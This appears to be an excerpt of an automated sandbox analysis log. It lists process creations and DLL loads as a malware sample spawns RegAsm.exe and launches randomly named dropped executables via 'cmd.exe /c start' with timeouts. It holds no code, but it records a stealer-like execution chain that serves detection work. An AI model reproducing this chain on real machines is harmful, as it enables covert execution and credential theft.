Source: C:\ProgramData\KJEGDBKFIJ.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" Jump to behavior
Source: C:\ProgramData\IIJKJDAFHJ.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\userBAAAAKJKJE.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\userAFIDGDBGCA.exe"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 10
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\userBAAAAKJKJE.exe "C:\Users\userBAAAAKJKJE.exe"
Source: C:\Users\userBAAAAKJKJE.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\userAFIDGDBGCA.exe "C:\Users\userAFIDGDBGCA.exe"
Source: C:\Users\userAFIDGDBGCA.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Users\user\Desktop\file.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: aclayers.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: sfc.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: sfc_os.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: rstrtmgr.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: dbghelp.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: sxs.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: mozglue.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: wsock32.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: vcruntime140.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: msvcp140.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: windowscodecs.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: slc.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: pcacli.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: windows.fileexplorer.common.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: ntshrui.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: ntshrui.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: linkinfo.dll Jump to behavior
Source: C:\ProgramData\GDBFCGIIIJ.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\ProgramData\GDBFCGIIIJ.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\ProgramData\GDBFCGIIIJ.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\ProgramData\GDBFCGIIIJ.exe Section loaded: version.dll Jump to behavior
Source: C:\ProgramData\GDBFCGIIIJ.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\ProgramData\GDBFCGIIIJ.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\ProgramData\GDBFCGIIIJ.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: aclayers.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: sfc.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: sfc_os.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: webio.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\ProgramData\KJEGDBKFIJ.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\ProgramData\KJEGDBKFIJ.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\ProgramData\KJEGDBKFIJ.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\ProgramData\KJEGDBKFIJ.exe Section loaded: version.dll Jump to behavior
Source: C:\ProgramData\KJEGDBKFIJ.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\ProgramData\KJEGDBKFIJ.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\ProgramData\KJEGDBKFIJ.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: aclayers.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: sfc.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: sfc_os.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: rstrtmgr.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: dbghelp.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: sxs.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\ProgramData\IIJKJDAFHJ.exe Section loaded: mscoree.dll
Source: C:\ProgramData\IIJKJDAFHJ.exe Section loaded: apphelp.dll
Source: C:\ProgramData\IIJKJDAFHJ.exe Section loaded: kernel.appcore.dll
Source: C:\ProgramData\IIJKJDAFHJ.exe Section loaded: version.dll
Source: C:\ProgramData\IIJKJDAFHJ.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\ProgramData\IIJKJDAFHJ.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\ProgramData\IIJKJDAFHJ.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: apphelp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: aclayers.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: mpr.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: sfc.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: sfc_os.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: sspicli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: wininet.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: rstrtmgr.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: ncrypt.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: ntasn1.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: iertutil.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: windows.storage.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: wldp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: profapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: winhttp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: mswsock.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: iphlpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: winnsi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: urlmon.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: srvcli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: netutils.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: dpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: ntmarta.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: mozglue.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: wsock32.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: vcruntime140.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: msvcp140.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: vcruntime140.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: uxtheme.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: propsys.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: edputil.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: wintypes.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: appresolver.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: bcp47langs.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: slc.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: userenv.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: sppc.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: pcacli.dll
Source: C:\Windows\SysWOW64\timeout.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: apphelp.dll
Source: C:\Users\userBAAAAKJKJE.exe Section loaded: mscoree.dll
Source: C:\Users\userBAAAAKJKJE.exe Section loaded: apphelp.dll
Source: C:\Users\userBAAAAKJKJE.exe Section loaded: kernel.appcore.dll
Source: C:\Users\userBAAAAKJKJE.exe Section loaded: version.dll
Source: C:\Users\userBAAAAKJKJE.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\userBAAAAKJKJE.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\userBAAAAKJKJE.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: apphelp.dll
Source: C:\Users\userAFIDGDBGCA.exe Section loaded: mscoree.dll
Source: C:\Users\userAFIDGDBGCA.exe Section loaded: apphelp.dll
Source: C:\Users\userAFIDGDBGCA.exe Section loaded: kernel.appcore.dll
Source: C:\Users\userAFIDGDBGCA.exe Section loaded: version.dll
Source: C:\Users\userAFIDGDBGCA.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\userAFIDGDBGCA.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\userAFIDGDBGCA.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: apphelp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: aclayers.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: mpr.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: sfc.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: sfc_os.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: sspicli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: wininet.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: rstrtmgr.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: ncrypt.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: ntasn1.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: dbghelp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: iertutil.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: windows.storage.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: wldp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: profapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: winhttp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: mswsock.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: iphlpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: winnsi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: urlmon.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: srvcli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: netutils.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: dnsapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: rasadhlp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: schannel.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: mskeyprotect.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: msasn1.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: dpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: rsaenh.dll
